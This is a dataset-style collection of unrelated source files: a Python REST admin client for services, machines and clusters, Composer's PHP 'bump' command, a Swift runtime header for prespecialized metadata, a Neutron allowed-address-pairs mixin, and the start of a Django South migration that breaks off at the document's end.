    @property
    def folders(self):
        """Folder resources for every sub-folder except the root "/"."""
        return [self._get_subfolder("./%s/" % name, Folder)
                for name in self._json_struct['folders']
                if name != "/"]

    @property
    def types(self):
        type_resource = self._get_subfolder("./types/", server.JsonPostResult)
        return type_resource._json_struct['types']

    def __getitem__(self, itemname):
        # Folder names take precedence; otherwise fall back to services.
        wanted = itemname.lower()
        for name in self._json_struct['folders']:
            if name.lower() == wanted:
                return self._get_subfolder("./%s/" % name, Folder)
        return super(Services, self).__getitem__(itemname)

    def __iter__(self):
        # Yield services inside sub-folders first, then top-level ones.
        for folder in self.folders:
            for service in folder.services:
                yield service
        for service in super(Services, self).__iter__():
            yield service
class Service(server.RestURL):
    """A single service instance on the server."""

    @property
    def name(self):
        js = self._json_struct
        return js['serviceName'] + "." + js['type']

    @property
    def status(self):
        return self._get_subfolder("./status/",
                                   server.JsonPostResult)._json_struct

    @property
    def statistics(self):
        return self._get_subfolder("./statistics/",
                                   server.JsonPostResult)._json_struct

    def start(self):
        """Start the service; returns the server's JSON response."""
        return self._get_subfolder("./start/",
                                   server.JsonPostResult)._json_struct

    def stop(self):
        """Stop the service; returns the server's JSON response."""
        return self._get_subfolder("./stop/",
                                   server.JsonPostResult)._json_struct

    def delete(self):
        """Delete the service; returns the server's JSON response."""
        return self._get_subfolder("./delete/",
                                   server.JsonPostResult)._json_struct
class Machine(server.RestURL):
    """Base class for a single machine on a site"""

    @property
    def name(self):
        return self._json_struct['machineName']

    @property
    def admin_url(self):
        return self._json_struct['adminURL']

    @property
    def platform(self):
        return self._json_struct['platform']

    def start(self):
        """Start this machine; returns the server's JSON response."""
        return self._get_subfolder("./start/",
                                   server.JsonPostResult)._json_struct

    def stop(self):
        """Stop this machine; returns the server's JSON response."""
        return self._get_subfolder("./stop/",
                                   server.JsonPostResult)._json_struct

    def unregister(self):
        """Remove this machine from the site; returns the JSON response."""
        return self._get_subfolder("./unregister/",
                                   server.JsonPostResult)._json_struct
class Machines(server.RestURL):
    """Base class for a list of machines, both on a Cluster and a Site"""
    __post__ = True
    # Ellipsis marks "not fetched yet" for the lazy machine cache.
    __machines__ = Ellipsis

    @property
    def _machines(self):
        """Mapping of machineName -> attribute dict (built once, cached)."""
        if self.__machines__ is Ellipsis:
            self.__machines__ = dict((entry['machineName'], entry)
                                     for entry in self._json_struct['machines'])
        return self.__machines__

    def keys(self):
        return self._machines.keys()

    def __iter__(self):
        # Iterating yields an Admin resource per machine's admin URL.
        return (Admin(entry['adminURL'])
                for entry in self._machines.itervalues())

    def register(self, machine_name, admin_url=None):
        """Register a machine; returns the server's JSON response."""
        return self._get_subfolder("./register/",
                                   server.JsonPostResult,
                                   {'machineName': machine_name,
                                    'adminURL': admin_url})._json_struct
class ClusterMachines(Machines):
    """A list of machines participating on a cluster"""

    def _post_each(self, action, machine_names):
        # Accept one name or an iterable of names; POST them one at a time.
        if isinstance(machine_names, basestring):
            machine_names = [machine_names]
        return [self._get_subfolder(action, server.JsonPostResult,
                                    {"machineNames": name})
                for name in machine_names]

    def add(self, machine_names):
        """Add machine(s) to the cluster; returns one result per name."""
        return self._post_each("./add/", machine_names)

    def remove(self, machine_names):
        """Remove machine(s) from the cluster; one result per name."""
        return self._post_each("./remove/", machine_names)
class SiteMachines(Machines):
    """A list of machines on a site"""
    def register(self, machineName, adminURL=None):
        # NOTE(review): the POST result is assigned but never returned, so
        # this override returns None, unlike Machines.register which returns
        # the parsed JSON -- confirm whether that is intentional.
        res = self._get_subfolder("./register/", server.JsonPostResult,
                                  {'machineName': machineName,
                                   'adminURL': adminURL})
    @property
    def machines(self):
        # One Machine resource per known machine name.
        return [self._get_subfolder("./%s/" % machinename, Machine) for
                machinename in self._machines]
    def __getitem__(self, itemname):
        # Look up a single machine by name; AssertionError when unknown.
        assert itemname in self._machines, "Couldn't find %s" % itemname
        return self._get_subfolder('./%s/' % itemname, Machine)
class Directory(server.RestURL):
    """A single registered server directory resource."""
    __post__ = True
class Directories(server.RestURL):
    """The collection of server directories registered on the site."""

    #: Lazy cache slot; Ellipsis means "not fetched yet".
    __directories__ = Ellipsis

    @property
    def _directories(self):
        """Mapping of physicalPath -> directory attribute dict.

        Fix: the cache slot was declared but never consulted, so every
        access re-parsed the JSON; now it is lazily built once, matching
        the sibling Machines._machines / Clusters._clusters pattern.
        """
        if self.__directories__ is Ellipsis:
            path_and_attribs = [(d['physicalPath'], d)
                                for d in self._json_struct['directories']]
            self.__directories__ = dict(path_and_attribs)
        return self.__directories__

    def __contains__(self, k):
        return k in self._directories

    def __getitem__(self, k):
        return self._directories[k]

    def register(self, type, path, vpath=None):
        """Register a directory.

        Fix: previously the server's JSON response was computed and
        silently dropped; it is now returned (callers that ignored the
        old None return are unaffected).
        """
        response = self._get_subfolder('./register', server.JsonPostResult,
                                       {'directoryType': type.upper(),
                                        'physicalPath': path,
                                        'virtualPath': vpath})._json_struct
        return response

    def unregister(self, path):
        """Unregister a directory; returns the server's JSON response."""
        response = self._get_subfolder('./unregister', server.JsonPostResult,
                                       {'physicalPath': path})._json_struct
        return response
class Cluster(server.JsonResult):
    """A single cluster of machines on the site."""
    __post__ = True
    __lazy_fetch__ = False
    __cache_request__ = True

    def __eq__(self, other):
        if not isinstance(other, Cluster):
            return False
        return self._url == other._url

    def __ne__(self, other):
        # Fix: Python 2 does not derive != from __eq__; keep them in sync.
        return not self.__eq__(other)

    @property
    def machineNames(self):
        # Fix: removed the dead `_error`/`_success` parameters -- a property
        # getter can never receive extra arguments.
        # Returns None when the key is absent from the JSON.
        if "machineNames" in self._json_struct:
            return self._json_struct["machineNames"]

    @property
    def machines(self):
        return self._get_subfolder("./machines/", ClusterMachines)

    def start(self):
        """Start the cluster; returns the server's JSON response."""
        return self._get_subfolder('./start/',
                                   server.JsonPostResult)._json_struct

    def stop(self):
        """Stop the cluster; returns the server's JSON response."""
        return self._get_subfolder('./stop/',
                                   server.JsonPostResult)._json_struct

    def delete(self):
        """Delete the cluster; returns the server's JSON response."""
        return self._get_subfolder('./delete/',
                                   server.JsonPostResult)._json_struct

    def editProtocol(self, type="TCP", tcpClusterPort=-1,
                     multicastAddress=10, multicastPort=-1):
        """Change the cluster protocol.

        Fix: the POST result was computed and dropped; it is now returned
        (previously the method always returned None).
        """
        if type not in ("TCP", "UDP"):
            raise ValueError("Got %r. Valid choices are: TCP, UDP" % type)
        # Only send the parameters relevant to the selected protocol.
        res = self._get_subfolder('./editProtocol', server.JsonPostResult,
                                  {'type': type,
                                   'tcpClusterPort': tcpClusterPort
                                                     if type == "TCP"
                                                     else None,
                                   'multicastAddress': multicastAddress
                                                       if type == "UDP"
                                                       else None,
                                   'multicastPort': multicastPort
                                                    if type == "UDP"
                                                    else None})
        return res
class Clusters(server.RestURL):
    """The collection of clusters defined on the site."""
    __post__ = True
    # Fix: removed the unused `__directories__` slot that was copy-pasted
    # from Directories; this class only uses the cluster cache below.
    #: Lazy cache slot; Ellipsis means "not fetched yet".
    __cluster_cache__ = Ellipsis

    @property
    def _clusters(self):
        """Mapping of clusterName -> Cluster resource (built once)."""
        if self.__cluster_cache__ is Ellipsis:
            pairs = [(d['clusterName'],
                      self._get_subfolder('./%s/' % d['clusterName'],
                                          Cluster))
                     for d in self._json_struct['clusters']]
            self.__cluster_cache__ = dict(pairs)
        return self.__cluster_cache__

    @property
    def clusterNames(self):
        return [d['clusterName'] for d in self._json_struct['clusters']]

    def __contains__(self, k):
        # Integer keys are positional; anything else is a cluster name.
        if isinstance(k, int):
            return k < len(self)
        return k in self._clusters

    def __getitem__(self, k):
        if isinstance(k, int):
            k = self.clusterNames[k]
        return self._clusters[k]

    def __len__(self):
        return len(self.clusterNames)

    def create(self, clusterName, type="TCP", tcpClusterPort=-1,
               multicastAddress=10, multicastPort=-1):
        """Create a new cluster and return its Cluster resource."""
        if type not in ("TCP", "UDP"):
            raise ValueError("Got %r. Valid choices are: TCP, UDP" % type)
        # Only send the parameters relevant to the selected protocol.
        self._get_subfolder('./create', server.JsonPostResult,
                            {'clusterName': clusterName,
                             'type': type,
                             'tcpClusterPort': tcpClusterPort
                                               if type == "TCP"
                                               else None,
                             'multicastAddress': multicastAddress
                                                 if type == "UDP"
                                                 else None,
                             'multicastPort': multicastPort
                                              if type == "UDP"
                                              else None})
        return self._get_subfolder('./%s/' % clusterName, Cluster)
|
unknown
|
codeparrot/codeparrot-clean
| ||
<?php declare(strict_types=1);
/*
* This file is part of Composer.
*
* (c) Nils Adermann <naderman@naderman.de>
* Jordi Boggiano <j.boggiano@seld.be>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Composer\Command;
use Composer\IO\IOInterface;
use Composer\Package\AliasPackage;
use Composer\Package\BasePackage;
use Composer\Package\Version\VersionBumper;
use Composer\Pcre\Preg;
use Composer\Util\Filesystem;
use Symfony\Component\Console\Input\InputInterface;
use Composer\Console\Input\InputArgument;
use Composer\Console\Input\InputOption;
use Symfony\Component\Console\Output\OutputInterface;
use Composer\Factory;
use Composer\Json\JsonFile;
use Composer\Json\JsonManipulator;
use Composer\Repository\PlatformRepository;
use Composer\Util\Silencer;
/**
* @author Jordi Boggiano <j.boggiano@seld.be>
*/
final class BumpCommand extends BaseCommand
{
private const ERROR_GENERIC = 1;
private const ERROR_LOCK_OUTDATED = 2;
use CompletionTrait;
    /**
     * Declares the command name, description, arguments, options and the
     * long help text shown by `composer help bump`.
     */
    protected function configure(): void
    {
        $this
            ->setName('bump')
            ->setDescription('Increases the lower limit of your composer.json requirements to the currently installed versions')
            ->setDefinition([
                new InputArgument('packages', InputArgument::IS_ARRAY | InputArgument::OPTIONAL, 'Optional package name(s) to restrict which packages are bumped.', null, $this->suggestRootRequirement()),
                new InputOption('dev-only', 'D', InputOption::VALUE_NONE, 'Only bump requirements in "require-dev".'),
                new InputOption('no-dev-only', 'R', InputOption::VALUE_NONE, 'Only bump requirements in "require".'),
                new InputOption('dry-run', null, InputOption::VALUE_NONE, 'Outputs the packages to bump, but will not execute anything.'),
            ])
            ->setHelp(
                <<<EOT
The <info>bump</info> command increases the lower limit of your composer.json requirements
to the currently installed versions. This helps to ensure your dependencies do not
accidentally get downgraded due to some other conflict, and can slightly improve
dependency resolution performance as it limits the amount of package versions
Composer has to look at.
Running this blindly on libraries is **NOT** recommended as it will narrow down
your allowed dependencies, which may cause dependency hell for your users.
Running it with <info>--dev-only</info> on libraries may be fine however as dev requirements
are local to the library and do not affect consumers of the package.
EOT
            )
        ;
    }
    /**
     * Entry point invoked by the console framework.
     *
     * Thin wrapper that forwards the parsed input to doBump(); presumably
     * doBump() is separate so other callers can reuse it with a different
     * flag hint -- see its $devOnlyFlagHint parameter (TODO confirm).
     *
     * @throws \Seld\JsonLint\ParsingException
     */
    protected function execute(InputInterface $input, OutputInterface $output): int
    {
        return $this->doBump(
            $this->getIO(),
            $input->getOption('dev-only'),
            $input->getOption('no-dev-only'),
            $input->getOption('dry-run'),
            $input->getArgument('packages')
        );
    }
/**
* @internal
* @param string[] $packagesFilter
* @throws \Seld\JsonLint\ParsingException
*/
public function doBump(
IOInterface $io,
bool $devOnly,
bool $noDevOnly,
bool $dryRun,
array $packagesFilter,
string $devOnlyFlagHint = '--dev-only'
): int {
/** @readonly */
$composerJsonPath = Factory::getComposerFile();
if (!Filesystem::isReadable($composerJsonPath)) {
$io->writeError('<error>'.$composerJsonPath.' is not readable.</error>');
return self::ERROR_GENERIC;
}
$composerJson = new JsonFile($composerJsonPath);
$contents = file_get_contents($composerJson->getPath());
if (false === $contents) {
$io->writeError('<error>'.$composerJsonPath.' is not readable.</error>');
return self::ERROR_GENERIC;
}
// check for writability by writing to the file as is_writable can not be trusted on network-mounts
// see https://github.com/composer/composer/issues/8231 and https://bugs.php.net/bug.php?id=68926
if (!is_writable($composerJsonPath) && false === Silencer::call('file_put_contents', $composerJsonPath, $contents)) {
$io->writeError('<error>'.$composerJsonPath.' is not writable.</error>');
return self::ERROR_GENERIC;
}
unset($contents);
$composer = $this->requireComposer();
$hasLockfileDisabled = !$composer->getConfig()->has('lock') || $composer->getConfig()->get('lock');
if (!$hasLockfileDisabled) {
$repo = $composer->getLocker()->getLockedRepository(true);
} elseif ($composer->getLocker()->isLocked()) {
if (!$composer->getLocker()->isFresh()) {
$io->writeError('<error>The lock file is not up to date with the latest changes in composer.json. Run the appropriate `update` to fix that before you use the `bump` command.</error>');
return self::ERROR_LOCK_OUTDATED;
}
$repo = $composer->getLocker()->getLockedRepository(true);
} else {
$repo = $composer->getRepositoryManager()->getLocalRepository();
}
if ($composer->getPackage()->getType() !== 'project' && !$devOnly) {
$io->writeError('<warning>Warning: Bumping dependency constraints is not recommended for libraries as it will narrow down your dependencies and may cause problems for your users.</warning>');
$contents = $composerJson->read();
if (!isset($contents['type'])) {
$io->writeError('<warning>If your package is not a library, you can explicitly specify the "type" by using "composer config type project".</warning>');
$io->writeError('<warning>Alternatively you can use '.$devOnlyFlagHint.' to only bump dependencies within "require-dev".</warning>');
}
unset($contents);
}
$bumper = new VersionBumper();
$tasks = [];
if (!$devOnly) {
$tasks['require'] = $composer->getPackage()->getRequires();
}
if (!$noDevOnly) {
$tasks['require-dev'] = $composer->getPackage()->getDevRequires();
}
if (count($packagesFilter) > 0) {
// support proxied args from the update command that contain constraints together with the package names
$packagesFilter = array_map(static function ($constraint) {
return Preg::replace('{[:= ].+}', '', $constraint);
}, $packagesFilter);
$pattern = BasePackage::packageNamesToRegexp(array_unique(array_map('strtolower', $packagesFilter)));
foreach ($tasks as $key => $reqs) {
foreach ($reqs as $pkgName => $link) {
if (!Preg::isMatch($pattern, $pkgName)) {
unset($tasks[$key][$pkgName]);
}
}
}
}
$updates = [];
foreach ($tasks as $key => $reqs) {
foreach ($reqs as $pkgName => $link) {
if (PlatformRepository::isPlatformPackage($pkgName)) {
continue;
}
$currentConstraint = $link->getPrettyConstraint();
$package = $repo->findPackage($pkgName, '*');
// name must be provided or replaced
if (null === $package) {
continue;
}
while ($package instanceof AliasPackage) {
$package = $package->getAliasOf();
}
$bumped = $bumper->bumpRequirement($link->getConstraint(), $package);
if ($bumped === $currentConstraint) {
continue;
}
$updates[$key][$pkgName] = $bumped;
}
}
if (!$dryRun && !$this->updateFileCleanly($composerJson, $updates)) {
$composerDefinition = $composerJson->read();
foreach ($updates as $key => $packages) {
foreach ($packages as $package => $version) {
$composerDefinition[$key][$package] = $version;
}
}
$composerJson->write($composerDefinition);
}
$changeCount = array_sum(array_map('count', $updates));
if ($changeCount > 0) {
if ($dryRun) {
$io->write('<info>' . $composerJsonPath . ' would be updated with:</info>');
foreach ($updates as $requireType => $packages) {
foreach ($packages as $package => $version) {
$io->write(sprintf('<info> - %s.%s: %s</info>', $requireType, $package, $version));
}
}
} else {
$io->write('<info>' . $composerJsonPath . ' has been updated (' . $changeCount . ' changes).</info>');
}
} else {
$io->write('<info>No requirements to update in '.$composerJsonPath.'.</info>');
}
if (!$dryRun && $composer->getLocker()->isLocked() && $composer->getConfig()->get('lock') && $changeCount > 0) {
$composer->getLocker()->updateHash($composerJson);
}
if ($dryRun && $changeCount > 0) {
return self::ERROR_GENERIC;
}
return 0;
}
/**
 * Writes the bumped constraints into composer.json via targeted text edits.
 *
 * Uses JsonManipulator so the rest of the file's formatting is left intact;
 * a false return tells the caller to fall back to a full decode/re-encode.
 *
 * @param array<'require'|'require-dev', array<string, string>> $updates
 */
private function updateFileCleanly(JsonFile $json, array $updates): bool
{
    $path = $json->getPath();

    $original = file_get_contents($path);
    if (false === $original) {
        throw new \RuntimeException('Unable to read '.$path.' contents.');
    }

    $manipulator = new JsonManipulator($original);
    foreach ($updates as $requireKey => $versions) {
        foreach ($versions as $packageName => $constraint) {
            // Any single failed in-place edit aborts the clean path entirely.
            if (!$manipulator->addLink($requireKey, $packageName, $constraint)) {
                return false;
            }
        }
    }

    if (false === file_put_contents($path, $manipulator->getContents())) {
        throw new \RuntimeException('Unable to write new '.$path.' contents.');
    }

    return true;
}
}
|
php
|
github
|
https://github.com/composer/composer
|
src/Composer/Command/BumpCommand.php
|
//===--- LibPrespecialized.h - Interface for prespecializations -*- C++ -*-===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2024 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
//
// Interface for interacting with prespecialized metadata library.
//
//===----------------------------------------------------------------------===//
#ifndef SWIFT_LIB_PRESPECIALIZED_H
#define SWIFT_LIB_PRESPECIALIZED_H
#include "PrebuiltStringMap.h"
#include "swift/ABI/Metadata.h"
#include "swift/ABI/TargetLayout.h"
#include "swift/Demangling/Demangler.h"
#define LIB_PRESPECIALIZED_TOP_LEVEL_SYMBOL_NAME "_swift_prespecializationsData"
namespace swift {
// Header of the prespecializations data blob exported under
// LIB_PRESPECIALIZED_TOP_LEVEL_SYMBOL_NAME. Fields are version-gated: use the
// accessors below, which return 0/NULL when this blob's minorVersion predates
// the field's introduction.
template <typename Runtime>
struct LibPrespecializedData {
  // Struct version written by the producer of the blob; compare against the
  // current* and minorVersionWith* constants below.
  uint32_t majorVersion;
  uint32_t minorVersion;

  // Name-keyed metadata table (see MetadataMap below). Present since v1.
  TargetPointer<Runtime, const void> metadataMap;
  // Table of process names for which prespecialization is disabled. v2+.
  TargetPointer<Runtime, const void> disabledProcessesTable;
  // Pointer-keyed metadata table. v3+.
  TargetPointer<Runtime, const void> pointerKeyedMetadataMap;
  // Bitmask of the OptionFlag* values below. v3+.
  typename Runtime::StoredSize optionFlags;
  // Descriptor lookup table (see DescriptorMap below). v4+.
  TargetPointer<Runtime, const void> descriptorMap;

  // Existing fields are above, add new fields below this point.
  // (Fields are only ever appended; readers gate on minorVersion.)

  // The major/minor version numbers for this version of the struct.
  static constexpr uint32_t currentMajorVersion = 1;
  static constexpr uint32_t currentMinorVersion = 4;

  // Version numbers where various fields were introduced.
  static constexpr uint32_t minorVersionWithDisabledProcessesTable = 2;
  static constexpr uint32_t minorVersionWithPointerKeyedMetadataMap = 3;
  static constexpr uint32_t minorVersionWithOptionFlags = 3;
  static constexpr uint32_t minorVersionWithDescriptorMap = 4;

  // Option flags values.
  enum : typename Runtime::StoredSize {
    // When this flag is set, the runtime should default to using the
    // pointer-keyed table. When not set, default to using the name-keyed table.
    OptionFlagDefaultToPointerKeyedMap = 1ULL << 0,

    // When this flag is set, the runtime should default to using the descriptor
    // map. When not set, default to turning off the descriptor map.
    OptionFlagDescriptorMapDefaultOn = 1ULL << 1,

    // When this flag is set, descriptorMap is not comprehensive, meaning that
    // a negative lookup result is not a definitive failure.
    OptionFlagDescriptorMapNotComprehensive = 1ULL << 2,
  };

  // Helpers for safely retrieving various fields. Helpers return 0 or NULL if
  // the version number indicates that the field is not present.
  typename Runtime::StoredSize getOptionFlags() const {
    if (minorVersion < minorVersionWithOptionFlags)
      return 0;
    return optionFlags;
  }

  // Key predicate for MetadataMap: a NULL key marks an empty slot.
  static bool stringIsNull(const char *str) { return str == nullptr; }

  using MetadataMap = PrebuiltStringMap<const char *, Metadata *, stringIsNull>;

  // v1 field, so no version gate is needed here.
  const MetadataMap *getMetadataMap() const {
    return reinterpret_cast<const MetadataMap *>(metadataMap);
  }

  const char *const *getDisabledProcessesTable() const {
    if (minorVersion < minorVersionWithDisabledProcessesTable)
      return nullptr;
    return reinterpret_cast<const char *const *>(disabledProcessesTable);
  }

  const void *getPointerKeyedMetadataMap() const {
    if (minorVersion < minorVersionWithPointerKeyedMetadataMap)
      return nullptr;
    return pointerKeyedMetadataMap;
  }

  using DescriptorMap =
      PrebuiltAuxDataImplicitStringMap<TargetPointer<Runtime, const void>,
                                       uint16_t>;

  const DescriptorMap *getDescriptorMap() const {
    if (minorVersion < minorVersionWithDescriptorMap)
      return nullptr;
    return reinterpret_cast<const DescriptorMap *>(descriptorMap);
  }
};
// Outcome of a lookup in the prespecialized tables.
enum class LibPrespecializedLookupResult {
  // We found something.
  Found,

  // We didn't find anything, and we know it's not in the shared cache.
  DefinitiveNotFound,

  // We didn't find anything, but we couldn't rule out the shared cache. Caller
  // must do a full search.
  NonDefinitiveNotFound,
};

// Returns the in-process prespecializations blob, if one is available.
const LibPrespecializedData<InProcess> *getLibPrespecializedData();

// Looks up prespecialized metadata for the given type descriptor and generic
// arguments.
Metadata *getLibPrespecializedMetadata(const TypeContextDescriptor *description,
                                       const void *const *arguments);

// NOTE(review): name suggests this is invoked when an image is loaded —
// confirm against the call sites in the runtime.
void libPrespecializedImageLoaded();

// Looks up a prespecialized type descriptor for the demangling `node`; the
// descriptor half of the pair accompanies the lookup result.
std::pair<LibPrespecializedLookupResult, const TypeContextDescriptor *>
getLibPrespecializedTypeDescriptor(Demangle::NodePointer node);
/// Given the demangling referring to a particular descriptor, build the
/// canonical simplified version of the demangling that's used for the keys in
/// the descriptorMap. We copy across Extension and Module nodes. Type nodes are
/// all normalized to be OtherNominalType to allow for the runtime allowing
/// type kind mismatches on imported C types in certain cases. Other nodes are
/// skipped.
///
/// The runtime always searches through duplicates in the table, and uses its
/// own matching on all candidates, so the simplified demangling is allowed to
/// be simplified to the point of having different descriptors sometimes produce
/// the same demangling.
static inline Demangle::NodePointer
buildSimplifiedDescriptorDemangling(Demangle::NodePointer node,
                                    Demangle::Demangler &dem) {
  // The node that will be returned to the caller.
  Demangle::NodePointer result = nullptr;

  // The bottommost node in the result that we've generated. Additional nodes
  // are added as children to this one.
  Demangle::NodePointer resultBottom = nullptr;

  // The current node that we're iterating over in the input node tree.
  Demangle::NodePointer current = node;

  using Kind = Demangle::Node::Kind;

  // Helper to add a new node to the result. This sets `result` to the node if
  // it hasn't already been set (indicating this is the topmost node), and adds
  // the node as a child to `resultBottom` otherwise. `resultBottom` is updated
  // to point to the new node.
  auto addNode = [&](Demangle::NodePointer newNode) {
    if (!result) {
      result = newNode;
    } else {
      if (resultBottom->getKind() == Kind::Extension) {
        // An Extension copy was created with only its Module child; the new
        // node fills the open second slot.
        resultBottom->addChild(newNode, dem);
      } else {
        // Shift the Identifier down, insert before it. Appending the first
        // child duplicates it at the end, then replaceChild(0, ...) overwrites
        // the original slot, yielding children [newNode, Identifier].
        resultBottom->addChild(resultBottom->getFirstChild(), dem);
        resultBottom->replaceChild(0, newNode);
      }
    }
    resultBottom = newNode;
  };

  // Walk down the input node tree.
  while (current) {
    switch (current->getKind()) {
    case Kind::Extension: {
      // Extensions are copied across. The new extension node has the module
      // from the original, and the second child will be added as we traverse
      // the next node in the tree.
      auto copy = dem.createNode(Kind::Extension);
      auto module = current->getChild(0);
      if (module == nullptr || module->getKind() != Kind::Module)
        return nullptr; // Malformed input: bail out rather than guess.
      copy->addChild(module, dem);
      addNode(copy);
      current = current->getChild(1);
      break;
    }
    case Kind::Module: {
      // Module contents are always in the form we want, so we can incorporate
      // this node verbatim and terminate the walk.
      addNode(current);
      current = nullptr;
      break;
    }
    case Kind::Protocol: {
      // Bring Protocol nodes across verbatim, there's no fuzzy matching.
      addNode(current);
      current = nullptr;
      break;
    }
    case Kind::OpaqueType:
    case Kind::Class:
    case Kind::Structure:
    case Kind::Enum:
    case Kind::TypeAlias:
    case Kind::OtherNominalType: {
      // Type nodes are copied across with the kind always set to
      // OtherNominalType.
      auto copy = dem.createNode(Kind::OtherNominalType);
      auto identifier = current->getChild(1);
      if (identifier == nullptr || identifier->getKind() != Kind::Identifier)
        return nullptr; // Malformed input: bail out rather than guess.
      copy->addChild(identifier, dem);
      addNode(copy);
      current = current->getChild(0);
      break;
    }
    default:
      // If we don't know about this node, continue the walk with its first
      // child.
      current = current->getFirstChild();
      break;
    }
  }
  return result;
}
} // namespace swift
// Validate the prespecialized metadata map by building each entry dynamically
// and comparing. This should be called before any metadata is built for other
// purposes, as any prespecialized entries that have already been cached will
// not be rebuilt, so the validation will be comparing the prespecialized
// metadata with itself.
//
// NOTE(review): an earlier version of this comment described outValidated /
// outFailed output parameters, but the declaration below takes no arguments —
// the counts are presumably reported by the implementation itself; confirm
// against the definition.
SWIFT_RUNTIME_EXPORT
void _swift_validatePrespecializedMetadata();
#endif // SWIFT_LIB_PRESPECIALIZED_H
|
c
|
github
|
https://github.com/apple/swift
|
include/swift/Runtime/LibPrespecialized.h
|
# Copyright 2013 VMware, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import sqlalchemy as sa
from sqlalchemy import orm
from neutron.api.v2 import attributes as attr
from neutron.db import db_base_plugin_v2
from neutron.db import model_base
from neutron.db import models_v2
from neutron.extensions import allowedaddresspairs as addr_pair
class AllowedAddressPair(model_base.BASEV2):
    """DB model for an extra (MAC, IP) pair a port is allowed to use.

    The composite primary key (port_id, mac_address, ip_address) makes each
    pair unique per port.
    """

    # Parent port; ON DELETE CASCADE removes pair rows with the port row.
    port_id = sa.Column(sa.String(36),
                        sa.ForeignKey('ports.id', ondelete="CASCADE"),
                        primary_key=True)
    mac_address = sa.Column(sa.String(32), nullable=False, primary_key=True)
    ip_address = sa.Column(sa.String(64), nullable=False, primary_key=True)

    # Joined (eager) backref so ports carry their pairs without an extra
    # query; "delete" cascade cleans up pairs on ORM-level port deletion.
    port = orm.relationship(
        models_v2.Port,
        backref=orm.backref("allowed_address_pairs",
                            lazy="joined", cascade="delete"))
class AllowedAddressPairsMixin(object):
    """Mixin providing CRUD helpers for port allowed address pairs."""

    def _process_create_allowed_address_pairs(self, context, port,
                                              allowed_address_pairs):
        """Persists the given address pairs for a port.

        Pairs that lack a 'mac_address' key are filled in (in place) with the
        port's own MAC before being stored. Returns the (possibly mutated)
        input list, or [] when the attribute was not set.
        """
        if not attr.is_attr_set(allowed_address_pairs):
            return []
        with context.session.begin(subtransactions=True):
            for pair in allowed_address_pairs:
                # setdefault both supplies the port's MAC when missing and
                # writes it back into the caller's dict, matching the
                # original contract.
                mac = pair.setdefault('mac_address', port['mac_address'])
                context.session.add(AllowedAddressPair(
                    port_id=port['id'],
                    mac_address=mac,
                    ip_address=pair['ip_address']))
        return allowed_address_pairs

    def get_allowed_address_pairs(self, context, port_id):
        """Returns API dicts for every pair stored for the given port."""
        rows = context.session.query(AllowedAddressPair)
        rows = rows.filter_by(port_id=port_id)
        return [self._make_allowed_address_pairs_dict(row) for row in rows]

    def _extend_port_dict_allowed_address_pairs(self, port_res, port_db):
        # The pairs arrive eagerly loaded alongside the port (joined backref
        # on the model), so building this list issues no extra query.
        port_res[addr_pair.ADDRESS_PAIRS] = [
            self._make_allowed_address_pairs_dict(pair)
            for pair in port_db.allowed_address_pairs]
        return port_res

    # Register dict extend functions for ports
    db_base_plugin_v2.NeutronDbPluginV2.register_dict_extend_funcs(
        attr.PORTS, ['_extend_port_dict_allowed_address_pairs'])

    def _delete_allowed_address_pairs(self, context, id):
        """Deletes every address pair row bound to the given port id."""
        query = self._model_query(context, AllowedAddressPair)
        matching = query.filter(AllowedAddressPair.port_id == id)
        with context.session.begin(subtransactions=True):
            matching.delete()

    def _make_allowed_address_pairs_dict(self, allowed_address_pairs,
                                         fields=None):
        """Projects a pair row/dict onto its API representation."""
        return self._fields(
            {'mac_address': allowed_address_pairs['mac_address'],
             'ip_address': allowed_address_pairs['ip_address']},
            fields)

    def _has_address_pairs(self, port):
        """True when the request carries a set, non-empty pair list."""
        pairs = port['port'][addr_pair.ADDRESS_PAIRS]
        return attr.is_attr_set(pairs) and pairs != []

    def _check_update_has_allowed_address_pairs(self, port):
        """Reports whether the update request supplies address pairs.

        True only when 'allowed_address_pairs' is present on the request and
        holds a set, non-empty value.
        """
        if addr_pair.ADDRESS_PAIRS not in port['port']:
            return False
        return self._has_address_pairs(port)

    def _check_update_deletes_allowed_address_pairs(self, port):
        """Reports whether the update request clears address pairs.

        True when 'allowed_address_pairs' is present on the request but its
        value is [] or not set.
        """
        if addr_pair.ADDRESS_PAIRS not in port['port']:
            return False
        return not self._has_address_pairs(port)

    def is_address_pairs_attribute_updated(self, port, update_attrs):
        """Reports whether 'allowed_address_pairs' actually changes.

        Useful for deciding whether agents or third-party controllers need a
        port update notification.
        """
        new_pairs = update_attrs.get(addr_pair.ADDRESS_PAIRS)
        if new_pairs is None:
            # Attribute absent from the update: nothing changes.
            return False
        return new_pairs != port.get(addr_pair.ADDRESS_PAIRS)

    def update_address_pairs_on_port(self, context, port_id, port,
                                     original_port, updated_port):
        """Replaces a port's address pairs when the request changes them.

        Returns True when the caller should emit an update notification;
        notification itself is left to the caller, which may be batching
        other port changes. Expected to run inside a transaction.
        """
        if not self.is_address_pairs_attribute_updated(original_port,
                                                       port['port']):
            return False
        new_pairs = port['port'].get(addr_pair.ADDRESS_PAIRS)
        updated_port[addr_pair.ADDRESS_PAIRS] = new_pairs
        self._delete_allowed_address_pairs(context, port_id)
        self._process_create_allowed_address_pairs(
            context, updated_port, new_pairs)
        return True
|
unknown
|
codeparrot/codeparrot-clean
| ||
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South migration adding the free-form 'tags' field to wiki.Revision."""

    def forwards(self, orm):
        """Applies the migration: create the new column."""
        # Adding field 'Revision.tags'
        db.add_column('wiki_revision', 'tags', self.gf('django.db.models.fields.CharField')(default='', max_length=255, blank=True), keep_default=False)

    def backwards(self, orm):
